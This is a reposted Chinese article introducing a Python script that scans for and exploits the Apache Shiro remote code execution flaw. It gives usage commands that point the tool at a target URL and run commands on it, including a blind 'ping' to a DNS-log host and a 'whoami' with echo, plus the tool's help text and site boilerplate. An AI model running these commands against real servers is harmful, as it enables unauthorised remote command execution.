一個簡單的Shiro RCE檢測和利用腳本
0x01 工具介紹
一個簡單的Shiro RCE檢測和利用腳本。
0x02 安裝與使用
1、安裝需要的包
pip install -r requirements.txt
2、檢查該漏洞
python ShiroRceTool.py -m scan -u "http://example.com"
3、執(zhí)行命令 (不回顯)
python ShiroRceTool.py -m exploit -u "http://example.com" -c "ping dnslog.example.com"
4、執(zhí)行命令(嘗試回顯)
python ShiroRceTool.py -m exploit -u "http://example.com" -c "whoami" -e
5、獲取幫助 - Get help
python ShiroRceTool.py
____ _ _ ____ _____ _
/ ___|| |__ (_)_ __ ___ | _ ___ __|_ _|__ ___ | |
\___ | '_ | | '__/ _ | |_) / __/ _ | |/ _ / _ | |
___) | | | | | | | (_) | _ < (_| __/| | (_) | (_) | |
|____/|_| |_|_|_| \___/|_| _\___\___||_|\___/ \___/|_|
By: Hack3rHan
usage: ShiroRceTool.py [-h] [-m MODE] [-u URL] [-c CMD] [-e]
options:
-h, --help show this help message and exit
-m MODE, --mode MODE "exploit" or "scan".
-u URL, --url URL URL of the target.
-c CMD, --cmd CMD Command to execute.
-e, --echo Echo mode.
審核編輯:湯梓紅
聲明:本文內(nèi)容及配圖由入駐作者撰寫或者入駐合作網(wǎng)站授權(quán)轉(zhuǎn)載。文章觀點僅代表作者本人,不代表電子發(fā)燒友網(wǎng)立場。文章及其配圖僅供工程師學(xué)習(xí)之用,如有內(nèi)容侵權(quán)或者其他違規(guī)問題,請聯(lián)系本站處理。
舉報投訴
-
檢測
+關(guān)注
關(guān)注
5文章
4601瀏覽量
92523 -
命令
+關(guān)注
關(guān)注
5文章
726瀏覽量
22667 -
腳本
+關(guān)注
關(guān)注
1文章
396瀏覽量
28340
原文標(biāo)題:一個簡單的Shiro RCE檢測和利用腳本。
文章出處:【微信號:菜鳥學(xué)安全,微信公眾號:菜鳥學(xué)安全】歡迎添加關(guān)注!文章轉(zhuǎn)載請注明出處。
發(fā)布評論請先 登錄
相關(guān)推薦
熱點推薦
Lua腳本簡單介紹
Lua簡單介紹Lua[1]是一個小巧的腳本語言。作者是巴西人。該語言的設(shè)計目的是為了嵌入應(yīng)用程序中,從而為應(yīng)用程序提供靈活的擴(kuò)展和定制功能。Lua腳
發(fā)表于 08-20 06:37
Lua腳本簡單介紹
Lua簡單介紹Lua[1]是一個小巧的腳本語言。作者是巴西人。該語言的設(shè)計目的是為了嵌入應(yīng)用程序中,從而為應(yīng)用程序提供靈活的擴(kuò)展和定制功能。Lua腳
發(fā)表于 08-20 08:06
基于DirectShow技術(shù)的RCE算法視頻加密方案
本文設(shè)計了一種利用DirectShow 技術(shù)結(jié)合一種新的RCE 算法實現(xiàn)視頻數(shù)據(jù)加密的方案。首先介紹了RCE 算法的加密解密過程和原理,然后
發(fā)表于 06-26 08:52
?35次下載
Apache Shiro框架的詳細(xì)資料說明
對新的用戶機(jī)制并不熟悉,導(dǎo)致出現(xiàn)問題時耗費了大量的時間來進(jìn)行修復(fù)。因此,我認(rèn)為我有必要編寫此文來介紹一下新的 Shiro 用戶機(jī)制。
發(fā)表于 03-08 08:00
?4次下載
如何創(chuàng)建和執(zhí)行一個簡單的Linux shell腳本
如果您愿意要嘗試更長的shell腳本,請將下面的shell腳本(并附加為PDF和ODT文件)復(fù)制到文本編輯器中,保存,使其可執(zhí)行并運行。當(dāng)您了解更多Linux命令時,您可以創(chuàng)建更復(fù)雜的shell腳本。
如何巧妙利用HFSS腳本錄制功能
。 摘要: 在學(xué)個Antenna:HFSS腳本建模入門中,介紹了利用HFSS自帶的Record Script To File功能進(jìn)行腳本錄制。但是大部分情況下,工程師們只是希望錄制
109個實用shell腳本分享
Shell腳本,就是利用Shell的命令解釋的功能,對一個純文本的文件進(jìn)行解析,然后執(zhí)行這些功能,也可以說Shell腳本就是
如何創(chuàng)建一個簡單的腳本
Shell 腳本可以為您節(jié)省時間和精力,但是如果您不保護(hù)您的密碼,它們就會成為您的負(fù)擔(dān)。以下是如何保持安全的方法。
shiro綜合利用工具介紹
shiro綜合利用工具:ShiroExp ? 工具介紹 shiro一把梭工具,該輪子主要有三大功能如下: 1、默認(rèn)密鑰爆破 利用Simple
利用Python寫了一個監(jiān)控服務(wù)器資源利用率的腳本!
研究了一個腳本,其主要目的是:基于 Python 編程語言來監(jiān)控服務(wù)器的 CPU、內(nèi)存、/目錄、/appslog、/bigdata目錄使用率以及網(wǎng)卡接收和發(fā)送情況。
shiro如何實現(xiàn)Web應(yīng)用認(rèn)證
前面簡單介紹了shiro這個框架的一些基本知識,包括其架構(gòu)模型,主要的功能,關(guān)鍵名稱的含義,以及核心模塊和對應(yīng)的接口定義。 開始的話 今天我們從一個
Shiro功能介紹
記得做的第一個Web項目,系統(tǒng)認(rèn)證授權(quán)這塊就是基于Shiro實現(xiàn)的,當(dāng)時也是第一次接觸到這種類型的框架,同時是基于Spring做的集成,并且相關(guān)的配置都已經(jīng)是定制好的,只需要我們根據(jù)項目情況對極少
工商網(wǎng)監(jiān)
評論